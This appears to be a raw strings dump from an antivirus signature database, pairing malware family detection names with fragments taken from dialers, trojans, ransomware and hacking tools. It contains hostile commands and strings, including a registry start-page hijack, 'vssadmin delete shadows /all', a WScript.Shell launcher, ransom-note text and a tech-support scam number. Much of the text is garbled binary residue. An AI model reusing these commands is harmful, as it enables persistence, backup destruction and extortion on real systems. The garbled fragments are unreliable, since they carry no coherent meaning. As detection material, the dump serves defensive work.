Genehmigung geschieht, wenn er durch denx RasDial DIDIpremiumdp_@mmprs 058343 DIDI114058343 http://community.derbiz.com/ andlotsmore.com surfya.com http://www.mypaymate.com/dialerplatform/tmp.htm 194.67.87.33 222.2.111.55 ASDPLUGIN ASDPLUGIN] KD\\&LD !Trafficadvance .trafficadvance.net ad Internet )\\Microsoft\\Internet Explorer\\Quick Launch RCF.%hd.%hd|MoD.%hd RCF.%hd.%hd|MoD.%hda DSoftware\\Microsoft\\SystemCertificates\\TrustedPublisher\\Certificates RASApi32.dll ASOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones AccessMySQL. \t&Recupera \t&Recuperax trafficadvance.net Connessione terminata, riconnettersi? dial709 NWDialerMini NETVISION dcikpcfhalmblomhkcfcebnnefiledge anjpbmbpjjaghgmoncmmkfhmmmd goicfboogidikkejccmclpieicihhlpo ahkdca Passe-partout Pronostici PronosticixI Recupera TempoEntra SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones Non ci sono modem configurati nel sistema. http://www.3000.ws/ Disinstalla.lnk No modem has taken shape in this system. No modem has taken shape in this system.] !Rapido Gracias por utilizar los servicios de acceso .accesorapido.com por minuto. Tiempo aprox. restante: %dm %ds Tiempo aprox. restante: %dm %ds] MD\\!PD !Colecto AtlMon.ReusableComp.5 AtlMon.ReusableComp.5c AtlMon.ReusableComp.7 AtlMon.ReusableComp.7] PD\\!QD !DlStwoyle {B5959C25-CBBD-4dcc-8C98-DA25EBB3D89F} &dtype=%s&dname=%s&phone=%s q%d_disk.dll acc%d &tmmin=%d &tmmin=%d] !Adialer !Adialer%@ dialer-pl-temp\\dial-intelli-v \\kol.pas Internet Sexplorer S E X P L O R E R SOFTWARE\\Microsoft\\Windows\\Currentversion\\Run -SOFTWARE\\Microsoft\\Windows\\Currentversion\\Run /min z vat. Nazwa operatora podana jest poni ,/min z vat. Nazwa operatora podana jest ponix lKa3GYT3jydNhXwixyxi4Xdi8Bm0GNl6qYCibrLP5OQXY8FAJSie/viNtJmkw10Qq1wNMst/EyFeKkaUhKeZqgOdLtJUaEmubqkyhWRB lLytujakGNW58PaCJ5hc+d/YrhcTVRGpe2gxIDuYJkPRIUcOhGCCSBEgmKOojsxB9lDpC1kcv1Ic8A== lJygpruDLj57lvzH5DU5V722qy+Koe5Qj6cYifYoljTFww== lJygpruDLj57lvzH5DU5V722qy+Koe5Qj6cYifYoljTFww==x &site= &country= ?webmaster= Dial error! Code: %d! if exist \"%s\" goto Loop UninstallDialer... %02d.%02d.%04d %02d:%02d:%02d C:\\WINDOWS\\Coder\\coder.log Restart... HangUp :\\TEMP\\ kernel32::ReadFile( kgjqaucmcaoasj dwjxgabcxwfsl vbgvklozwrg vpimqgwobs vqtkzjafquzjyf vqtkzjafquzjyfx !#HSTR:MSIL/Tnega.RRH1307!MTB p%ow%er%sh%el%l What the fuck!x !#TEL:Trojan:Win32/Zbot.RM!MTB T(Proxy server) _T(Port:) _T(User:) _T(Password:) Gatekeeper Gatekeeperx !#HSTR:Trojan:MSIL/AgentTesla.OXAV!MTB k !#ALF:Worm:Win32/Dridex.VT!MTB \t!#ALF:Worm:Win32/Dridex.VT!MTB HWND_UserSize GetSystemPowerStatus WTSEnumerateProcessesW WTSRegisterSessionNotification WTSShutdownSystem WTSWaitSystemEvent WTSWaitSystemEventx !#TEL:Trojan:Win32/Kovter_Decrypt !#ALF:HackTool:Win32/Blackmailer SOFTWARE\\BlackMailer BlackMailer\\license.dat Do not use this tool for spamming! CompanyNameBlackMailerx !#Lowfi:TrojanDownloader:Win32/Eyooun :niuniu _wangju_union_ad_server Download>>>[ wj.center. .info cleandata.yac.mx/Yacapi/returnExec SYSTEM\\CurrentControlSet\\services\\iSafeService \\Build\\isafe\\branches\\ \\bin\\iSvc.pdb !#Lowfi:HSTR:BProtect:AvgIEToolbar toolbar.dll - ProcessInstallPreference - SetNewTab CRegistryGuard::GetRegistryKeyValue AVG Secure Searchx Paint1.CustomColorDialog.resources Paint1.Form1.resources PaintIt.Main.resources PaintIt.Properties.Resources.resources PaintIt.ScreenOverlay.resources !#HSTR:Trojan:MSIL/AgentTesla.OXGO!MTB WinMarketDataRetriver get_SADXHIJU get_MainDomains ssssc WinMarketDataRetriver.MDXs !#ALF:HSTR:Ransom:MSIL/LockScreen.H Customer Service 1-844-459-8882 Customer support !#HSTR:Win32/Obfuscator.WriteProcessMemoryNamePatch.A \t!#HSTR:Win32/Obfuscator.WriteProcessMemoryNamePatch.A riteProcessMemory riteProcessMemoryx !#ALF:Trojan:Win32/QbotCrypt.B!MTB !#ALF:Hacktool:Win32/Cuckcu.A!dha 34544b98-a943-4f7b-b818-74eddbb8b705 \\ccu\\ccu\\ccu\\ \\encrption program\\ EncryptFile: This program isn't allowed here 5AA95D22 \\Error.txtx !#ALF:HSTR:Crossrider_Installer6 autoenablechrome is defined. BundledChrome autoenablechrome is defined.BundledChrome - Writing the extension to Chrome's policy. Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist - Writing the extension to Chrome's policy.Software\\Policies\\Google\\Chrome\\ExtensionInstallForcelist InsertChromeExtensionToChromePreferencesFile crossriderapp crossriderappx !#ALF:Trojan:Win64/Frooty.A!dha \\GlooxSounds \\chat_request.wav \\incoming.wav today20040917~~ HmM, We can't rEach tHIs pAgE This list describeS the TWO forMs. Hi, Give me your new phone NO. Hi, Give me your new phone NO.x !#HSTR:Trojan:Win32/Tnega.PAB!MTB lohukiwazitasixubalicacefome fodaxe hifisudefiziyigalejajarinekaham gokatunimefop liwiwirarup vofovocadicupupelirujifayas bitenipuselucimixofeyolujuc gukagigu vofovocadicupupelirujifayas bitenipuselucimixofeyolujuc gukagigux !#TEL:HackTool:Win32/Fingerprint.A!dha Cannot bind to LDAP://root ProcessInfo KB[0-9]{6}$ DetectAntivirus: \\SecurityCenter2 Path AntiSpywareProduct Get /format:htablex !#SLFPER:Trojan:Win32/ShortWick.B!dha ff7172d9c888b7a88a7d77372112d772 ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d /ACTION=VIEW&PAGE=%s&CODE=%s&CACHE=%s&REQUEST=%d ACTION=PREVPAGE&CODE=C%s&RES=%d ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%d (ACTION=NEXTPAGE&CODE=S%s&CACHE=%s&RES=%dx !#HSTR:MSIL/Packer.NativeCall.A NtResumeThread !#Adware:Win32/SideOn sideon.co.kr/ .co.kr/ex.dat except.dat ex.dat this%sraison setting.dat %s\\%s\\ setting.dat%s\\%s\\ retarget urlretarget urlex delurlex WinPro.ini WinPro.dll /th0.asp?k=%s&id /except.dat Winkey.ini [keywordsex]x !#ALF:Trojan:Win32/StartPage.SH!MTB Run Game.exe.bat1 219 reg delete \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /V \"START PAGE\" /f i reg ADD \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /V \"START PAGE\" /t REG_SZ /d http://www.egy8.com reg ADD \"HKCU\\Software\\Microsoft\\Internet Explorer\\Main\" /V \"START PAGE\" /t REG_SZ /d http://www.egy8.comx !#ALF:Trojan:MSIL/AgentTesla.BLH!MTB ClassLibrary.Jmcagvp.Data .Load. .Load.x !#ALF:PSW:MSIL/Disstl.BAD!MTB bdlevel\\egarotS lacoL\\btpdrocsid bdlevel\\egarotS lacoL\\yranacdrocsid Reverse_Token_Grabber_Source ([A-Za-z0-9_\\./\\\\-]*) RemoveAccessRule WebHook DownloadStringx !#ALF:Trojan:Win64/IcedId.SIBG!MTB !#HSTR:Obfuscator.OffsetsToLocals.A !#FakeCert!MEUSCA21 =L D_XO !#FakeCert!MEUSCA23 An i_ L~FPj !#ALFPER:Win32/Foniad!domain enclosely.info maraukog.info suggedin.info insupposity.info efishedo.info aclassigned.info acinster.infox !#ALF:Trojan:Win32/AgentCrypt.SN!MTB !#ALF:Trojan:Win32/Zbot.RSD!MTB T2w[X \\eiolohon otify\\ rolxet001\\ ervices\\Xhar ccess\\ nacled: me.uknet !#ALF:Exploit:Win32/Chessila.A!dha Failed to allocate memory at address 0xffffffff, please try again NtDCompositionCreateSynchronizationObject SeSetAccessStateGenericMapping NtQuerySystemInformation error Inappropriate Operating System Inappropriate Operating Systemx TestSecurity.dll ITS Secure Browser.exe Software\\VB and VBA Program Settings\\ITSSecureApps\\Configuration C:\\Program Files\\ITS\\Exam Files C:\\Program Files\\ITS\\Exam Filesx !#TEL:Trojan:Win32/Trogbot.C!dha \t!#TEL:Trojan:Win32/Trogbot.C!dha {324D8268-635E-4c4b-A99F-461C9F4FD377} holds data in an electromagnetic form STConfig STData strunlib.dll %sloop: %d min %sproxy %d: %s:%d <transferTempletToSummary> <RequestNativeBrowser> <RequestNativeBrowser>x !#ALF:Worm:Win32/Autorun.RG @icon @drv. @exeh -= The Porn Collection =- open=icondrv.exe shell\\Autoplay\\command=icondrv.exe \"shell\\Autoplay\\command=icondrv.exe SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon 5SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogonx !#HSTR:Trojan:MSIL/AgentTesla.SSMZ!MTB \t\t\t!#HSTR:Trojan:MSIL/AgentTesla.SSMZ!MTB Fc3D8Mib9dDb6T ORO510faSf6T54d P96ro24768de Hdh49kencpbxzc Y711G9J921Zlb7d Trump2026Trump2026 Trump2026Trump2026x !#SLFPER:Win32/Myrddin.C \t\t\t!#SLFPER:Win32/Myrddin.C /Ne0nd0g/merlin/ /pkg/messages.init /exec/exec_windows.go /pkg/messages.AgentControl /pkg/messages.CmdPayload /pkg/agent.ExecuteCommand /agent/agent_windows.go /merlinagent/main.go mattn/go-shellwords mattn/go-shellwordsx !#ALF:Backdoor:MSIL/GhostRat.GA!MTB \t\t f-secure.exe Mcshield.exe Sunbelt baiduSafeTray.exe {4D36E972-E325-11CE-BFC1-08002BE10318} [WIN] [Print Screen] Shellex %s\\%d.bak %s\\%d.bakx !#ALF:Trojan:MSIL/AgentTesla.BBF!MTB StartTests RefRegModel ClassLibrary1 ClassLibrary1StartTests 77*90*144*0*3* *33*0*0*0*5*0*0*0*73*0*0*0*56*28*0*0*0*2*3*40*2*0*0*6*32*0 AssemblyResolvex !#HSTR:Trojan:MSIL/AgentTesla.VI22!MTB _ aiiD39x/oTfKXhd/dkA41iBiQ6YtYGdk asmndbnmdb VerifyDetails VerifyDetailsx !#FakeCert!MEUSCA22 sP_i^ !#ALF:HSTR:VirTool:MSIL/GeneralPacker.S0F CreateObject(\"WScript.Shell\").run strs,0,false = \"%windir%\\Microsoft.NET\\Framework\\v2.0.50727\\installutil /logtoconsole=false /logfile= /u \" & Chrw( ) & \"%path%\" & Chrw( !#ALF:TrojanDownloader:Win64/IcedId.SIBB!MTB !#HSTR:Trojan:Win32/Mapstosteal PCOM.DLL NewPatcher.exe SOFTWARE\\Wizet\\MapleStory LoginGAME \tLoginGAME MapleStory.exe MapleStoryGlobal :: MapleStory - Microsoft Internet Explorer <MapleStoryGlobal :: MapleStory - Microsoft Internet Explorer ?WzSoap_ConsultDelete@ D:\\DevPatch\\_FINAL\\Bin\\MapleStory.pdb D:\\DevPatch\\_FINAL\\Bin\\MapleStory.pdbx http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word= %s %s hcnet3_running %s %sopenrhcnet3_runningiexplore.exe IEXPLORE.EXE http\\shell\\open\\commandIEXPLORE.EXE ForceRemove {594BE7B2-23B0-4FAE-A2B9-0C21CC1417CE} = s 'Search Class' ForceRemove {594BE7B2-23B0-4FAE-A2B9-0C21CC1417CE} = s 'Search Class'x !#ALF:Trojan:MSIL/Tnega.RM!MTB $4ab3b95d-373c-4197-8ee3-fe0fa66ca122 Rhttps://s1.ax1x.com/2020/04/28/J4Zp9S.png Loader.Loader DebuggerInactive DebuggerInactivex !#ALF:Trojan:Win32/WebDial.SM!MSR Software\\Webdialer WebDialer - Reg.N: Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Webdialer - http://www.redirserver.com/update4.cfm?tid=&cn_id= http://www.redirserver.com/update4.cfm?tid=&cn_id=x !#SLF:Trojan:Win32/Shmusho.C!dha Operation_Global_Code_tag /tmp/devlog/orbit/keyring/ send sms from %s imsi:%s to %s /ts_123040v040200p.pdf nono%s_%04d%02d%02d.csv tcap parse continue originating transaction id tag fail libpcap.so.1 libpcap.so.1x !#TEL:Trojan:Win32/GreenSprog.A botid=%s sysinfo=/api/pop ---------------------------287055381131322 Content-Disposition: form-data; name=\"uploaded\"; filename=\" Content-Disposition: form-data; name=\"botid\" /api/pop?botid= output=%s& output=%s&x !#ALF:HackTool:Win64/Kerdu.A CVE-2015-2291 EneTechIo64 KDUControlProcess KDUProvList PROCEXP152 -rport tcpip.sys tcpip.sysx !#ALF:Ransom:MSIL/FileCryptor.AB!MTB do not try to rename encrypted files Your computer is infected with a virus. ALL YOUR FILES ARE ENCRYPTED /C choice /C Y /N /D Y /T 1 & Del .info.hta SPI_SETDESKWALLPAPER fileEncryptionrc4 fileEncryptionrc4x !#TEL:Trojan:Win32/RedJetsam.A!dha \\Red2\\MiddleMan\\Bin\\ MiddleMan.exe 77393C65-EEBB-43B3-8793-19CF95413977 passMe Middle.ini startup database module error. Del user [%s] %s. Reuse V2 implicit activation dosen't support NT 6.0+ os Reuse V2 implicit activation dosen't support NT 6.0+ osx !#HSTR:Trojan:MSIL/AgentTesla.OXFJ!MTB sadada MessageSurrogateFilter RC2Decrypt IKMNJIUHBVGYTCVXRDEF SelectorX SelectorXx !#AllowList:ConsoleApplication C:\\Users\\jselbie\\source\\repos\\ConsoleApplication \\Debug\\ConsoleApplication PDBOpenValidate SOFTWARE\\Wow6432Node\\Microsoft\\VisualStudio\\ \\Setup\\VC !#ALF:Ransom:Win32/MegaCortex.A!MTB Man is the master of everything and decides everything If you are reading this text, it means, we've hacked your corporate network. vssadmin delete shadows /all /for= !!!_READ-ME_!!!.txtx !#ALF:Trojan:Win32/Zbot.SIBZ!MTB PQYXXPQYX APQYX_N WPQYX !#FakeCert!METPPCA2019 !#HSTR:VirTool:Win32/DelfInject.AL jjjhP FileNameAtual PERSIST shell_traywnd !#ALF:Hacktool:Win32/Skynetter.A!dha GetGmailSeletionHtml Yahoo Error Email Code Page Hotmail Error Obfuscation Page Truncate table IpsForbidx !#HSTR:Delphi_Decoder \"!#SCRIPT:Trojan:JS/Kilim!FB_Script '9\"!#SCRIPT:Trojan:JS/Kilim!FB_Script *!#SCPT:Exploit:VBS/CVE-2014-6332_SunDown.1 '9*!#SCPT:Exploit:VBS/CVE-2014-6332_SunDown.1 *!#SCPT:TrojanDownloader:VBS/Obfuse.RA1!MTB '9*!#SCPT:TrojanDownloader:VBS/Obfuse.RA1!MTB *!#SCPT:TrojanDownloader:VBS/Obfuse.RA2!MTB '9*!#SCPT:TrojanDownloader:VBS/Obfuse.RA2!MTB *!#SCPT:TrojanDownloader:VBS/Obfuse.RA3!MTB '9*!#SCPT:TrojanDownloader:VBS/Obfuse.RA3!MTB *!#SLF:HackTool:PowerShell/Macroburst.X!MTB '9*!#SLF:HackTool:PowerShell/Macroburst.X!MTB *!#SLF:HackTool:PowerShell/Macroburst.Y!MTB '9*!#SLF:HackTool:PowerShell/Macroburst.Y!MTB !#TEL:HTML/TechBrolo!redir #!#ALF:SCPT:Worm:VBS/Jenxcus!Crypt50 ':#!#ALF:SCPT:Worm:VBS/Jenxcus!Crypt50 $=>:x; !#SCRIPT:JS/Obfuscator.HF.2 !#SCRIPT:PowerShell/Hizak.A !#SCPT:Worm:VBS/Jenxcus!Crypt28 #!#SCRIPT:Exploit:Win32/Pdfjsc.AJQ.2 4 wt':#!#SCRIPT:Exploit:Win32/Pdfjsc.AJQ.2 #!#SCRIPT:Trojan:JS/Bepush!FB_Script ':#!#SCRIPT:Trojan:JS/Bepush!FB_Script ':#!#SLF:PowerShell/Ploty.gen.D!MainPS '!#SCPT:TrojanDownloader:JS/Nemucod.BK!B ':'!#SCPT:TrojanDownloader:JS/Nemucod.BK!B '!#SCPT:TrojanDownloader:JS/Nemucod.CM!A ':'!#SCPT:TrojanDownloader:JS/Nemucod.CM!A /!#SharedFragmentReplaceInFuncInFuncEncJSNemucod @':/!#SharedFragmentReplaceInFuncInFuncEncJSNemucod +!#TEL:SCPT:LowFi:Exploit:JS/Wagplat_lowfi_1 ':+!#TEL:SCPT:LowFi:Exploit:JS/Wagplat_lowfi_1 +!#TEL:SCRIPT:TrojanDownloader:JS/Nemucod.SB ':+!#TEL:SCRIPT:TrojanDownloader:JS/Nemucod.SB $!#ALF:TrojanDownloader:VBS/DMALocker ';$!#ALF:TrojanDownloader:VBS/DMALocker 0!#ALF:TrojanDownloader:PowerShell/Zojectdow.S001 ';0!#ALF:TrojanDownloader:PowerShell/Zojectdow.S001 .i 8Z 0!#ALF:TrojanDownloader:PowerShell/Zojectdow.S002 ';0!#ALF:TrojanDownloader:PowerShell/Zojectdow.S002 0!#ALF:TrojanDownloader:PowerShell/Zojectdow.S003 ';0!#ALF:TrojanDownloader:PowerShell/Zojectdow.S003 !#SCRIPT:PowerShell/DmnFoz.A !#SCRIPT:PowerShell/KepSez.A !#SLF:PowerShell/PoshC2!func ,!#TEL:SCPT:LowFi:Exploit:JS/Anogre.K_lowfi_1 ';,!#TEL:SCPT:LowFi:Exploit:JS/Anogre.K_lowfi_1 ,!#TEL:SCPT:LowFi:Exploit:JS/Anogre.K_lowfi_2 ';,!#TEL:SCPT:LowFi:Exploit:JS/Anogre.K_lowfi_2 !#SCPT:Exploit:JS/Axpergle.AI !#SCPT:Exploit:JS/Axpergle.BA !#SCPT:Exploit:JS/Axpergle.BH !#SCPT:Exploit:JS/Axpergle.BL !#SCPT:Exploit:JS/Axpergle.BN !#SCRIPT:PowerShell/FindFruit !#SCRIPT:PowerShell/Octopus.A !#SCRIPT:PowerShell/PowerView !#SCRIPT:PowerShell/SozProz.A '<%!#SCRIPTLOWFI:Trojan:PHP/Redirector.H !#ALF:PowerShell/GetBrowzer.A1 &!#ALF:Backdoor:PowerShell/Webrev.A!dha '=&!#ALF:Backdoor:PowerShell/Webrev.A!dha !#SCRIPT:PowerShell/PrivzChk.B &!#TEL:TrojanDownloader:VBS/Betisrypt.A '=&!#TEL:TrojanDownloader:VBS/Betisrypt.A !#ALF:DotNetMeterpreter MO@J V !#ALF:SCPT:VBS/Crypt.32 !#ALF:SCPT:VBS/Crypt.34 6xvJ-uM /!#ALF:HackTool:PowerShell/AADInternalsPSM.A!MTB '>/!#ALF:HackTool:PowerShell/AADInternalsPSM.A!MTB /!#ALF:HackTool:PowerShell/AADSyncSettings.A!MTB '>/!#ALF:HackTool:PowerShell/AADSyncSettings.A!MTB /!#ALF:SCPT:TrojanDownloader:Win32/Mekotio.B!bit '>/!#ALF:SCPT:TrojanDownloader:Win32/Mekotio.B!bit !#SCPT:Worm:VBS/Jenxcus!Crypt22 !#SCRIPT:PowerShell/Viewdevobfs '? !#ALF:Trojan:PowerShell/Winpin.A (!#ALF:Trojan:PowerShell/MSAppProxy.A!MTB '?(!#ALF:Trojan:PowerShell/MSAppProxy.A!MTB !#SCRIPT:PowerShell/Ezchi.A1!MTB '? !#SCRIPT:PowerShell/Ezchi.A1!MTB 0!#SCPT:TrojanDownloader:PowerShell/Bartallex_gen '?0!#SCPT:TrojanDownloader:PowerShell/Bartallex_gen )!#SCRIPT:Powershell/DomainPasswordSpray.A '@)!#SCRIPT:Powershell/DomainPasswordSpray.A 1!#TEL:SCPT:TrojanDownloader:JS/PossibleNeutrinoEK '@1!#TEL:SCPT:TrojanDownloader:JS/PossibleNeutrinoEK *!#ALF:Trojan:PowerShell/ReverseShell.A!MTB 'A*!#ALF:Trojan:PowerShell/ReverseShell.A!MTB !#TEL:HTML/TechBrolo!Popup +!#ALF:SCPT:TrojanDownloader:VBS/Adodb.W!bit 'B+!#ALF:SCPT:TrojanDownloader:VBS/Adodb.W!bit !#SCRIPT:JS/Ploty.A }o9Z{ $!#ALF:HackTool:PowerShell/ADFS.A!MTB 'C$!#ALF:HackTool:PowerShell/ADFS.A!MTB (!#ALF:Backdoor:PowerShell/Goodabox.A!dha 'C(!#ALF:Backdoor:PowerShell/Goodabox.A!dha l(Ue8 (!#ALF:TrojanDownloader:VBS/REntS.SIB!MTB RH'C(!#ALF:TrojanDownloader:VBS/REntS.SIB!MTB ,!#ALF:HackTool:PowerShell/ProcessTools.A!MTB 'C,!#ALF:HackTool:PowerShell/ProcessTools.A!MTB %!#ALF:HackTool:PowerShell/Noterally.A 'D%!#ALF:HackTool:PowerShell/Noterally.A )!#ALF:TrojanDownloader:VBS/REntS.SIBA!MTB 'D)!#ALF:TrojanDownloader:VBS/REntS.SIBA!MTB !#SCRIPT:PowerShell/Poshspy.A vc}F50 %!#SCPT:JS/Nemucod_TryAndReturnWscript 'D%!#SCPT:JS/Nemucod_TryAndReturnWscript &!#ALF:Trojan:PowerShell/OneDrive.A!MTB 'E&!#ALF:Trojan:PowerShell/OneDrive.A!MTB !#SLF:PowerShell/PoshC2.B.func oq%e_ !#SLF:PowerShell/PoshC2 %QS]. !#SCPT:VBS/JenxcusAnsiToString4 !#SCPT:Worm:VBS/Jenxcus!Crypt17 )!#ALF:HackTool:PowerShell/Namedpipe.A!MTB 'H)!#ALF:HackTool:PowerShell/Namedpipe.A!MTB )!#ALF:SCPT:TrojanDownloader:VBS/Banload!1 'H)!#ALF:SCPT:TrojanDownloader:VBS/Banload!1 )!#ALF:SCPT:TrojanDownloader:VBS/Banload!2 'H)!#ALF:SCPT:TrojanDownloader:VBS/Banload!2 !#SCPT:Exploit:JS/Astsan.A *!#TEL:SCRIPT:TrojanDownloader:VBS/Vibrio.J 'I*!#TEL:SCRIPT:TrojanDownloader:VBS/Vibrio.J 'J#!#SCRIPT:PowerShell/Mimikatz!MainPS $!#ALF:Trojan:PowerShell/Holmes.A!MTB 'K$!#ALF:Trojan:PowerShell/Holmes.A!MTB (!#ALF:TrojanDownloader:VBS/SLoad.SIB!MTB 'K(!#ALF:TrojanDownloader:VBS/SLoad.SIB!MTB !#SCRIPT:PowerShell/Gwiper.A $!#SCRIPT:PowerShell/Mecheck.A!MainPS 'K$!#SCRIPT:PowerShell/Mecheck.A!MainPS P}=P~ %!#ALF:Trojan:PowerShell/Gropers.A!MTB 'L%!#ALF:Trojan:PowerShell/Gropers.A!MTB !#SCRIPT:PowerShell/LyncSez.A &!#ALF:VirTool:PowerShell/Gopherz.A!MTB 'M&!#ALF:VirTool:PowerShell/Gopherz.A!MTB .!#ALF:Trojan:PowerShell/MSAppProxy_utils.A!MTB 'M.!#ALF:Trojan:PowerShell/MSAppProxy_utils.A!MTB !#SCRIPT:PowerShell/MFAUtils.A 51PYL Yg 8T( !#SLF:HackTool:Python/Pypykatz (!#ALF:HackTool:PowerShell/PrixChkz.A!MTB 'O(!#ALF:HackTool:PowerShell/PrixChkz.A!MTB 0!#ALF:Trojan:PowerShell/MFAProvisioningAPI.A!MTB 'O0!#ALF:Trojan:PowerShell/MFAProvisioningAPI.A!MTB !#SLF:PowerShell/PoshC2!Internal 'O !#SLF:PowerShell/PoshC2!Internal !!#ALF:Trojan:PowerShell/MDM.A!MTB 'P!!#ALF:Trojan:PowerShell/MDM.A!MTB ^_u<? !!#SCPT:Worm:VBS/Jenxcus!Crypt32.1 'P!!#SCPT:Worm:VBS/Jenxcus!Crypt32.1 *!#ALF:Trojan:PowerShell/Vigourfervid.A!MTB 'Q*!#ALF:Trojan:PowerShell/Vigourfervid.A!MTB 'R#!#SCRIPT:PowerShell/Mimikatz!MainPS '!#SCRIPT:TrojanClicker:JS/Faceliker.L_F 'R'!#SCRIPT:TrojanClicker:JS/Faceliker.L_F '!#SCRIPT:TrojanDownloader:HTML/Clodow.B !'R'!#SCRIPT:TrojanDownloader:HTML/Clodow.B Z=INjK 'S$!#SCRIPT:PowerShell/Mecheck.A!MainPS )!#ALF:TrojanDownloader:VB/DessertDown!dha 'T)!#ALF:TrojanDownloader:VB/DessertDown!dha !#SCRIPT:PowerShell/Clpawnz.A &!#ALF:Trojan:PowerShell/MDMUtils.A!MTB 'U&!#ALF:Trojan:PowerShell/MDMUtils.A!MTB !#SCRIPT:PowerShell/WebBrowser 8!#TEL:SCRIPT:TrojanDropper:VBS/Blindhind.A.Strontium!dha 'W8!#TEL:SCRIPT:TrojanDropper:VBS/Blindhind.A.Strontium!dha \"!#ALF:VirTool:Python/Gorgons.A!MTB 'Y\"!#ALF:VirTool:Python/Gorgons.A!MTB 'Y&!#FP_TrojanDownloader:HTML/Adodb.gen_A +!#ALF:Trojan:PowerShell/OneDriveUtils.A!MTB 'Z+!#ALF:Trojan:PowerShell/OneDriveUtils.A!MTB !#TrojanDownloader:JS/Skel.1 Z[v(b -!#SCRIPT:PowerShell/AzureADConnectAPI_utils.A '\\-!#SCRIPT:PowerShell/AzureADConnectAPI_utils.A 'c$!#SCRIPT:PowerShell/Mecheck.A!MainPS !#SCRIPT:PowerShell/LAPSToolkit #fp539598-VBS/LoveLetter.BT\ti '!#ALF:HackTool:PowerShell/Internaloff.W 'j'!#ALF:HackTool:PowerShell/Internaloff.W -!#ALF:Trojan:PowerShell/ProvisioningAPI.A!MTB !#ALF:Trojan:VBS/Donoff.R!MTB !Slow1 #fp5267 #fp6233 #fp6233tV #fp6235tV #fp6984 #103993631g #fp1421481 #fp1633912\tP@ #fp1633912* #fpFormatC #IRC/ACAD.1 #BAT/Crypt.19U #BAT/Crypt.2B1s #IRC/APVerif.1 #IRC/FOXPLAY.1 #IRC/THS2002.1G #IRC/THS2002.2P #IRC/THS2002.3 #IRC/THS2002.4V #IRC/THS2002.5 #IRC/THS2002.6^}[n #IRC/THS2002.7 #IRC/THS2002.8 #IRC/THS2002.9{ #IRC/STARDUST.1 #IRC/STARDUST.2W #IRC/STARDUST.3 #IRC/STARDUST.4 #IRC/SunClock.1 !#SCPT:Bundlore !#SCPT:Jenxcil.A !#SCPT:Jenxcus.KE #VBS/VBSWG.dr.gen` #IRC/Peace_Prot.1 #IRC/Peace_Prot.2 #IRC/Peace_Prot.3^ #IRC/Peace_Prot.4 #IRC/Peace_Prot.5X #IRC/Peace_Prot.6 #IRC/SPRJUKEBOX.18 #IRC/SPRJUKEBOX.2 #IRC/SPRJUKEBOX.3I #IRC/SPRJUKEBOX.4 #IRC/SPRJUKEBOX.5T #Worm:IRC/Generic !#PWE:Linsuavev.C1$E !#PWE:Linsuavev.C2 !#SCPT:Nemucod_end !#Trojan:JS/Brapps !#ALF:PUA:JS/FakeAVP! #IRC/KarmaRemover.1 !#SCPT:BlacoleRefB1 !#SCPT:SwabfexArray> !#SCRIPT:Vemrowst.A #Trojan:JS/Loop.gen} #Trojan:JS/Loop.gen #Exploit:JS/Fiexp.C0\" #Exploit:JS/Fiexp.C !#ActionSpyExtraSign !#SCPT:JS/Kilim!id_A !#Trojan:JS/Obfus.P1#4R !#Trojan:JS/Obfus.P2F:$ !#Trojan:JS/Obfus.P3#4R !#Trojan:JS/Obfus.P4F:$ #Trojan:BAT/FormatCY-m !#ALF:SCPT:Vango!cert !#SCPT:BAT/Emasen.B!1 !#SCPT:BAT/Emasen.B!2 !#SCPT:JS/MalScript.AG !#SCPT:JS/MalScript.B{ !#SCPT:JS/MalScript.C !#SCPT:JS/MalScript.D !#SCPT:JS/MalScript.E !#SCPT:JS/MalScript.F !#SCPT:JS/MalScript.G !#SCPT:JS/MalScript.H !#SCPT:JS/Nemucod.ST9 !#SCPT:JS/Nemucod.STa !#SCPT:JS/NemucodRStr !#SCPT:JS/NemucodSStr !#SCRIPT:VBS/FetchXML !#TEL:PUA:JS/Adinject !#Trojan:PHP/Phish.P1f@ !#Trojan:PHP/Phish.P2 !#Trojan:VBS/Tnega.P1j5 !#Trojan:VBS/Tnega.P2 !#Trojan:XML/Tnega.P1 !#Trojan:XML/Tnega.P2qaIp !#lowfi:Fareitbuilder !#PUA:Block:DriverPack:; !#SCPT:ClearLockMain.A !#SCPT:NemucodComments$ !#SCRIPT:ZBotASProtect Qe<($ !#SLF:NodiisWebShell.A !#SLF:NodiisWebShell.B !#SLF:NodiisWebShell.C !#SLF:NodiisWebShell.Dq !#TEL:HTML/Brocoiner.I0 !#TEL:HTML/Brocoiner.I !#TEL:HTML/Brocoiner.K #Backdoor:IRC/Cloner.H #Worm:VBS/VBSWG.dr.gen !#ALFPER:TeslaCrypt!txtN !#ALFPER:TeslaCrypt!txt !#Adware:MSIL/PlayBrytet !#Adware:MSIL/PlayBryte !#NScript:ForceTypeNone !#PUA:Block:PSWLaZagn.A !#SCPT:API_CryptoJS_AES !#SCPT:JS/Nemucod.R!MTBS !#SCPT:JS/Nemucod.R!MTBV !#SCPT:JS/Nemucod.R!MTBg !#SCPT:JS/Nemucod.R!MTBw !#SCPT:JS/Nemucod.R!MTB !#Trojan:Win32/Deminnixp #Backdoor:Perl/Shellbotr #Exploit:Win32/Pdfjsc.J !#Adware:Win32/Ga of'QP 7}%v: 13iw0 >'Vdh aGz@2L U)#J<?` 7xb[;f v>gz! D|l}% [y[O} bX}W`x @RqHvNb $`XE _6fv; 5H8Xk M\t Y@ eu/a: 3U$b1 %T}3XbH .PAGk b,$k{D ^OJw9 7xw lD {G@#,a rEW``< U@O:Y 1`A`O `b5l; UU;b:|&- ?\ts-\" sqZhTX +g)s* C(kK%5 -rA', ,M$/: AEg<5 U4jx, 9sq4XA Ft2bedg [[g&24 mwfUP^i CPan/$ wPZ94 /yh>m lN9F ]!bhmjJ dte2E aMA+g L}5!a 0 v` 5&{ - t'RmBmb+ (;>YAy8$ RA5N_ p<Y=/n` 6E[WZ okcTv~{ ]o0Ln 